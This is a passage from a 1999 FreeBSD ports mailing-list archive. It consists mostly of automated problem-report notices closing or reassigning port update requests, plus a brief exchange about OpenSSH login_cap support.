Precedence: bulk X-Loop: FreeBSD.org Synopsis: fix port: net/mrtg (BUILD/LIB_DEPEND problem) Responsible-Changed-From-To: freebsd-ports->jfitz Responsible-Changed-By: steve Responsible-Changed-When: Thu Dec 23 20:18:47 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:19:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EDC7414E7A; Thu, 23 Dec 1999 20:19:37 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA62422; Thu, 23 Dec 1999 20:19:37 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:19:37 -0800 (PST) From: Message-Id: <199912240419.UAA62422@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, nakai@FreeBSD.org Subject: Re: ports/15566: x11-wm/sawmill update Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: x11-wm/sawmill update Responsible-Changed-From-To: freebsd-ports->nakai Responsible-Changed-By: steve Responsible-Changed-When: Thu Dec 23 20:19:20 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:21:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 014C71518A; Thu, 23 Dec 1999 20:21:24 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA62669; Thu, 23 Dec 1999 20:21:24 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:21:24 -0800 (PST) From: Message-Id: <199912240421.UAA62669@freefall.freebsd.org> To: andrews@technologist.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/14478: status on port devel/gaa - feedback please. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: status on port devel/gaa - feedback please. State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:21:06 PST 1999 State-Changed-Why: Superceded by ports/15573. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:24:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1810A15747; Thu, 23 Dec 1999 20:24:56 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA63317; Thu, 23 Dec 1999 20:24:55 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:24:55 -0800 (PST) From: Message-Id: <199912240424.UAA63317@freefall.freebsd.org> To: inagaki@tg.rim.or.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15651: update: makejvf Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update: makejvf State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:24:46 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:26: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 34907157FF; Thu, 23 Dec 1999 20:26:02 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA63511; Thu, 23 Dec 1999 20:26:02 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:26:02 -0800 (PST) From: Message-Id: <199912240426.UAA63511@freefall.freebsd.org> To: vince@pele.WURLDLINK.NET, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15645: firewalk port build fails Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: firewalk port build fails State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:25:47 PST 1999 State-Changed-Why: Fixed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:27:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4692F157DB; Thu, 23 Dec 1999 20:27:32 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA63770; Thu, 23 Dec 1999 20:27:32 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:27:32 -0800 (PST) From: Message-Id: <199912240427.UAA63770@freefall.freebsd.org> To: darius@dons.net.au, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15605: Update of the tclreadline port to 1.0.3 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update of the tclreadline port to 1.0.3 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:26:28 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:29:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AD67515796; Thu, 23 Dec 1999 20:29:16 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA64128; Thu, 23 Dec 1999 20:29:16 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:29:16 -0800 (PST) From: Message-Id: <199912240429.UAA64128@freefall.freebsd.org> To: lodea@angmar.mel.vet.com.au, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15599: OpenLDAP 1.2.8 released Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: OpenLDAP 1.2.8 released State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:28:34 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:31:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2006E150FE; Thu, 23 Dec 1999 20:31:14 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA64484; Thu, 23 Dec 1999 20:31:14 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:31:14 -0800 (PST) From: Message-Id: <199912240431.UAA64484@freefall.freebsd.org> To: yasuf@big.or.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15590: Update: lang/ruby Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update: lang/ruby State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:31:03 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:32:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 53B721580A; Thu, 23 Dec 1999 20:32:46 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA64673; Thu, 23 Dec 1999 20:32:45 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:32:45 -0800 (PST) From: Message-Id: <199912240432.UAA64673@freefall.freebsd.org> To: yasuf@big.or.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15591: Update: x11-toolkits/rubytk Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update: x11-toolkits/rubytk State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:31:57 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:34: 2 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C423E15170; Thu, 23 Dec 1999 20:34:00 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA64935; Thu, 23 Dec 1999 20:34:00 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:34:00 -0800 (PST) From: Message-Id: <199912240434.UAA64935@freefall.freebsd.org> To: yasuf@big.or.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15592: Update: japanese/rubytk Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update: japanese/rubytk State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:33:11 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:35:55 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E8F081583F; Thu, 23 Dec 1999 20:35:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA65281; Thu, 23 Dec 1999 20:35:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:35:51 -0800 (PST) From: Message-Id: <199912240435.UAA65281@freefall.freebsd.org> To: alex@big.endian.de, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15589: update games/netris to 0.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update games/netris to 0.5 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:34:38 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:37:35 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1C92915804; Thu, 23 Dec 1999 20:37:28 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA65580; Thu, 23 Dec 1999 20:37:27 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:37:27 -0800 (PST) From: Message-Id: <199912240437.UAA65580@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15587: Update port: x11-clocks/t3d Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: x11-clocks/t3d State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:36:22 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:39:36 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6D97215787; Thu, 23 Dec 1999 20:39:26 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA65839; Thu, 23 Dec 1999 20:39:26 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:39:26 -0800 (PST) From: Message-Id: <199912240439.UAA65839@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15586: Update port: x11-clocks/dclock to pl6 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: x11-clocks/dclock to pl6 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:38:27 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:41: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B9ED3157BD; Thu, 23 Dec 1999 20:40:55 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA66108; Thu, 23 Dec 1999 20:40:55 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:40:55 -0800 (PST) From: Message-Id: <199912240440.UAA66108@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15585: Update port: x11-clocks/bclock Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: x11-clocks/bclock State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:40:01 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:43:55 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CA35215841; Thu, 23 Dec 1999 20:43:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA66496; Thu, 23 Dec 1999 20:43:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:43:51 -0800 (PST) From: Message-Id: <199912240443.UAA66496@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15584: Update port: lang/forth Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: lang/forth State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:42:33 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:46:16 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8F54515883; Thu, 23 Dec 1999 20:46:14 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA66861; Thu, 23 Dec 1999 20:46:14 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:46:14 -0800 (PST) From: Message-Id: <199912240446.UAA66861@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15583: Update port: lang/cim to 3.33 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: lang/cim to 3.33 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:44:55 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:48:53 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A2FED14E9B; Thu, 23 Dec 1999 20:48:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA67393; Thu, 23 Dec 1999 20:48:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:48:51 -0800 (PST) From: Message-Id: <199912240448.UAA67393@freefall.freebsd.org> To: anders@fix.no, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15575: Bugfix of port: net/dante Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Bugfix of port: net/dante State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:47:33 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:50:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F06C715805; Thu, 23 Dec 1999 20:50:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA67656; Thu, 23 Dec 1999 20:50:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:50:05 -0800 (PST) From: Message-Id: <199912240450.UAA67656@freefall.freebsd.org> To: dima@Chg.RU, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15574: Fix for net/ggsd mastersites Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Fix for net/ggsd mastersites State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:49:23 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:51:53 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 89C4B15783; Thu, 23 Dec 1999 20:51:32 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA67934; Thu, 23 Dec 1999 20:51:32 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:51:32 -0800 (PST) From: Message-Id: <199912240451.UAA67934@freefall.freebsd.org> To: dima@Chg.RU, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15573: Fix for devel/gaa distfiles Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Fix for devel/gaa distfiles State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:50:47 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:52:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9A3C7157FD; Thu, 23 Dec 1999 20:52:37 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA68173; Thu, 23 Dec 1999 20:52:37 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:52:37 -0800 (PST) From: Message-Id: <199912240452.UAA68173@freefall.freebsd.org> To: dima@Chg.RU, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15570: Please update net/p5-Net-RawIP Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Please update net/p5-Net-RawIP State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:52:00 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:54: 1 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3B0EC157BA; Thu, 23 Dec 1999 20:53:52 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA68431; Thu, 23 Dec 1999 20:53:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:53:51 -0800 (PST) From: Message-Id: <199912240453.UAA68431@freefall.freebsd.org> To: dima@Chg.RU, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15568: Please update sysutils/ascpu to 1.8 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Please update sysutils/ascpu to 1.8 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:53:15 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:55:28 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AC1DA151C4; Thu, 23 Dec 1999 20:55:27 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA68612; Thu, 23 Dec 1999 20:55:27 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:55:27 -0800 (PST) From: Message-Id: <199912240455.UAA68612@freefall.freebsd.org> To: huntting@glarp.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/11879: dclock's "-miltime" option and "*miltime" resource dont work Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: dclock's "-miltime" option and "*miltime" resource dont work State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:54:50 PST 1999 State-Changed-Why: Fixed with ports/15586. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:58:19 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BF191157E3; Thu, 23 Dec 1999 20:58:11 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA69173; Thu, 23 Dec 1999 20:58:11 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:58:11 -0800 (PST) From: Message-Id: <199912240458.UAA69173@freefall.freebsd.org> To: alex@big.endian.de, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15567: update games/bs to 2.2 (from 2.1) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update games/bs to 2.2 (from 2.1) State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:57:00 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 21:45:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from 1Cust16.tnt1.washington.dc.da.uu.net (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id BEE021516C; Thu, 23 Dec 1999 21:45:15 -0800 (PST) (envelope-from green@FreeBSD.org) Date: Fri, 24 Dec 1999 00:45:13 -0500 (EST) From: Brian Fundakowski Feldman X-Sender: green@green.dyndns.org To: steve@FreeBSD.org Cc: freebsd-ports@FreeBSD.org Subject: Re: ports/14859: OpenSSH has no support for the login class capability database. In-Reply-To: <199912240418.UAA62138@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 23 Dec 1999 steve@FreeBSD.org wrote: > Synopsis: OpenSSH has no support for the login class capability database. > > Responsible-Changed-From-To: freebsd-ports->green > Responsible-Changed-By: steve > Responsible-Changed-When: Thu Dec 23 20:18:15 PST 1999 > Responsible-Changed-Why: > Over to port's maintainer. > The title's kinda strange, since it DOES use login_cap... I wrote that support a while back. -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve! / green@FreeBSD.org `------------------------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 22:28:42 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.HiWAAY.net (fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (Postfix) with ESMTP id D5AF814CD5; Thu, 23 Dec 1999 22:28:39 -0800 (PST) (envelope-from sprice@hiwaay.net) Received: from localhost (sprice@localhost) by mail.HiWAAY.net (8.9.3/8.9.0) with ESMTP id AAA29539; Fri, 24 Dec 1999 00:28:38 -0600 (CST) Date: Fri, 24 Dec 1999 00:28:38 -0600 (CST) From: Steve Price To: Brian Fundakowski Feldman Cc: freebsd-ports@FreeBSD.org Subject: Re: ports/14859: OpenSSH has no support for the login class capability database. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 24 Dec 1999, Brian Fundakowski Feldman wrote: # The title's kinda strange, since it DOES use login_cap... I wrote that # support a while back. Forgive me for being a little slow at reading between the lines, but what is it you want me to do. You asked for feedback in the audit trail of the PR and I had hoped that by assigning it to you, it would eventually get closed since it was related to a port that you maintain. -steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 23:13:58 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6CABE1514F; Thu, 23 Dec 1999 23:13:56 -0800 (PST) (envelope-from nakai@FreeBSD.org) Received: (from nakai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA78381; Thu, 23 Dec 1999 23:13:56 -0800 (PST) (envelope-from nakai@FreeBSD.org) Date: Thu, 23 Dec 1999 23:13:56 -0800 (PST) From: Message-Id: <199912240713.XAA78381@freefall.freebsd.org> To: nakai@FreeBSD.org, freebsd-ports@FreeBSD.org, nakai@FreeBSD.org Subject: Re: ports/15563: Updating the lang/librep port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Updating the lang/librep port Responsible-Changed-From-To: freebsd-ports->nakai Responsible-Changed-By: nakai Responsible-Changed-When: Thu Dec 23 23:13:35 PST 1999 Responsible-Changed-Why: Over to the maintainer. :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 23:14:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6572D14D86; Thu, 23 Dec 1999 23:14:28 -0800 (PST) (envelope-from nakai@FreeBSD.org) Received: (from nakai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA78464; Thu, 23 Dec 1999 23:14:28 -0800 (PST) (envelope-from nakai@FreeBSD.org) Date: Thu, 23 Dec 1999 